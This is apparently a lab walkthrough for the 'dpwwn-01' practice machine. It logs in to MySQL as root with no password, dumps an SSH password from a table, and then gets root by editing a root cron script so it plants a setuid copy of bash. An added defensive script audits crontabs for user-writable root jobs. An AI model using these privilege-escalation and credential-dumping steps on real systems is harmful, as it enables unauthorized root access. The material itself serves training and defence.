dpwwn-01
usershell
Target IP: 192.168.205.147
Services:
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
fscan
[+] mysql:192.168.205.147:3306:root
MySQL connection
mysql -h 192.168.205.147 -u root
MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| ssh                |
+--------------------+
4 rows in set (0.009 sec)
MariaDB [(none)]> use ssh;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [ssh]> show tables;
+---------------+
| Tables_in_ssh |
+---------------+
| users         |
+---------------+
1 row in set (0.008 sec)
MariaDB [ssh]> select * from ssh.users;
+----+----------+---------------------+
| id | username | password            |
+----+----------+---------------------+
|  1 | mistic   | testP@$$swordmistic |
+----+----------+---------------------+
1 row in set (0.003 sec)
SSH credentials obtained.
Log in over SSH to get user-level access.
rootshell
Enumeration
cat /etc/crontab
*/3 * * * * root /home/mistic/logrot.sh
Change logrot.sh to:
#!/bin/bash
#
cp /bin/bash /home/mistic/rootbash
chmod +xs /home/mistic/rootbash
Wait a few minutes
~/rootbash -p
Root privileges obtained.
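
A defensive check for the condition used in the rootshell step (a root cron job running a script under a user's home directory), as an added example that is not part of the original notes. The function names risky_path and audit_root_cron and the sample crontab are constructed here.

```bash
#!/usr/bin/env bash
# Added example: flag root cron jobs whose script a non-root user could change.
# Function names and the sample crontab below are constructed for illustration.

# Print the path if it is not owned by root, or is group/other-writable
# (sticky directories such as /tmp are exempt from the mode check).
risky_path() {
  find "$1" -maxdepth 0 \( ! -user 0 -o \
    \( \( -perm -020 -o -perm -002 \) ! -perm -1000 \) \) -print 2>/dev/null
}

# Read a system crontab (format: m h dom mon dow user command) and report the
# first risky component of each absolute command path that runs as root.
audit_root_cron() {
  while read -r m h dom mon dow user cmd rest; do
    case $m in '#'*|'') continue ;; esac        # comments and blank lines
    [ "$user" = root ] || continue               # only jobs that run as root
    case $cmd in /*) ;; *) continue ;; esac      # only absolute command paths
    p=$(readlink -f -- "$cmd") || continue
    while :; do                                  # the file, then each parent directory
      if [ -n "$(risky_path "$p")" ]; then
        printf 'RISK %s (root cron command %s)\n' "$p" "$cmd"
        break
      fi
      [ "$p" = / ] && break
      p=$(dirname -- "$p")
    done
  done < "$1"
}

# Constructed sample shaped like the crontab entry above; temporary paths only.
demo() {
  d=$(mktemp -d)
  printf '#!/bin/bash\n' > "$d/logrot.sh"
  chmod 777 "$d/logrot.sh"
  printf '%s\n' '# m h dom mon dow user command' \
    "*/3 * * * * root $d/logrot.sh" \
    "*/5 * * * * mistic $d/logrot.sh" > "$d/crontab"
  audit_root_cron "$d/crontab"
  rm -rf "$d"
}
demo
```

On a real host, run audit_root_cron /etc/crontab; entries that wrap the script in a longer shell command line are skipped and need manual review.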